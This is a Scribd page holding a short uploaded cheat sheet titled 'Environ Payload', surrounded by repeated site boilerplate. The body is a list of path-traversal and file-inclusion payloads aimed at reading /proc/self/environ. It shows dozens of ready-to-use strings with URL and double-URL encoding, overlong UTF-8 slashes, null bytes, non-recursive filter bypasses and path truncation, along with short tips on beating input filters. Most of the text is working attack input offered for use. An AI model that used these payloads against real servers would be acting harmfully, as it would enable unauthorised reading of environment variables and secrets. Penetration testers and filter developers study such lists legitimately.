Scribd Logo
Upload

Welcome to Scribd!

  • Environ Payload

    Uploaded by

    Kamrul Islam
    6 views2 pages
    The document discusses techniques for bypassing path-based filters to access restricted files and directories. It provides examples of encoding, truncating, and manipulating path strings to try to evade filters and access the /proc/self/environ file on a system for the purpose of exploiting a vulnerability. Various encodings, truncations, and manipulations of the file path are shown, including URL encoding, adding null bytes, changing directory separators, and prepending paths to evade restrictions.

    Original Description:

    Copyright

    © © All Rights Reserved

    Available Formats

    TXT, PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    The document discusses techniques for bypassing path-based filters to access restricted files and directories. It provides examples of encoding, truncating, and manipulating path strings to try to evade filters and access the /proc/self/environ file on a system for the purpose of exploiting a vulnerability. Various encodings, truncations, and manipulations of the file path are shown, including URL encoding, adding null bytes, changing directory separators, and prepending paths to evade restrictions.

    Copyright:

    © All Rights Reserved
    Download as TXT, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    Download as txt, pdf, or txt
    6 views2 pages

    Environ Payload

    Uploaded by

    Kamrul Islam
    The document discusses techniques for bypassing path-based filters to access restricted files and directories. It provides examples of encoding, truncating, and manipulating path strings to try to evade filters and access the /proc/self/environ file on a system for the purpose of exploiting a vulnerability. Various encodings, truncations, and manipulations of the file path are shown, including URL encoding, adding null bytes, changing directory separators, and prepending paths to evade restrictions.

    Copyright:

    © All Rights Reserved
    Download as TXT, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    Download as txt, pdf, or txt
    of 2

    /proc/self/environ

    ../../../../../../../../../../../../../../../../../../proc/self/environ
    ../../../../../../../../..//./proc/./self/./environ
    ..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fproc%2fself%2fenviron
    ../../../../../../../../../proc/self//./environ
    ../../../../../../../../../proc/self//./////environ
    %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e
    %2fproc%2fself%2f%2f%2e%2fenviron

    sequences stripped non-recursively

    ....//....//....//....//....//....//....//....//....//proc/self/environ
    ....\/....\/....\/....\/....\/....\/....\/....\/....\/proc/self/environ
    url encoding
    %5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/%5c..
    %5c..%5c..%5c..%5c..%5c..%5c..%5c/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/%5c..%5c..
    %5c..%5c..%5c..%5c..%5c..%5c/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/%5c..%5c..%5c..
    %5c..%5c..%5c..%5c..%5c/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/%5c..%5c..%5c..%5c..
    %5c..%5c..%5c..%5c/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/%5c..%5c..%5c..%5c..%5c..
    %5c..%5c..%5c/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/%5c..%5c..%5c..%5c..%5c..%5c..
    %5c..%5c/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/proc/self/environ

    null byte

    ../../../../../../../../../../../../../../../../../../../../../../../../proc/self/
    environ%00

    Encoding
    You could use non-standard encondings like double URL encode (and others)

    ..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..
    %252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fproc%252fself
    %252environ
    ..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
    %c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afproc%c0%afself
    %c0%afenviron
    %252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e
    %252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fproc%252fself
    %252environ
    %252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252%252e%252e%252f%252e
    %252e%252f%252e%252e%252f%252e%252e%252fproc%252fself%252environ%00

    From existent folder


    Maybe the back-end is checking the folder path:
    utils/scripts/../../../../../../../../../../proc/self/environ

    It is possible to adapt this technique to find directories at any location in the


    file system. For instance, if, under the same hypothesis (current directory at
    depth 3 of the file system) you want to check if /var/www/ contains a private
    directory, use the following payload:
    ../../../var/www/private/../../../proc/self/environ
    Path truncation
    ../../../../../../../../../../../../../../../../../../../../../../../../proc/self/
    environ
    ../../../../../../../../../../../../../../../../../../../../../../../../proc///
    self//environ
    ../../../../../../../../../../../../../../../../../../../../../../../../proc/./
    self/./environ
    ../../../../../../../../../../../../../../../../../../../../../../../../proc/self/
    environ/
    ../../../../../../../../../../../../../../../../../../../../../../../../proc/self/
    environ/.

    Always try to start the path with a fake directory (a/).


    This vulnerability was corrected in PHP 5.3.
    a/../../../../../../../../../proc/self/
    environ..\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.
    \.\.\.\.\.\.\.
    a/../../../../../../../../../proc/self/
    environ/./././././././././././././././././././././././././././././././././././././.
    /././././././.

    #With the next options, by trial and error, you have to discover how many "../" are
    needed to delete the appended string but not "/etc/passwd" (near 2027)

    a/././././././././././././././././././././././././././././././././././././././././.
    /././././././././././././././././././././././proc/self/environ
    a/../../../../../../../../../../../../../../../../../../../../../../../../../../../
    ../../../../../../../../../../../../../../../../../proc/self/environ

    Filter bypass tricks


    ....//....//....//....//....//....//....//....//....//....//....//....//....//..../
    /....//....//....//....//proc/self/environ
    ..///////..////..//////..///////..////..//////..///////..////..//////..///////..///
    /..//////..///////..////..//////proc/self/environ
    /%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../proc/self/
    environ
    Maintain the initial path: /var/www/../../proc/self/environ

    You might also like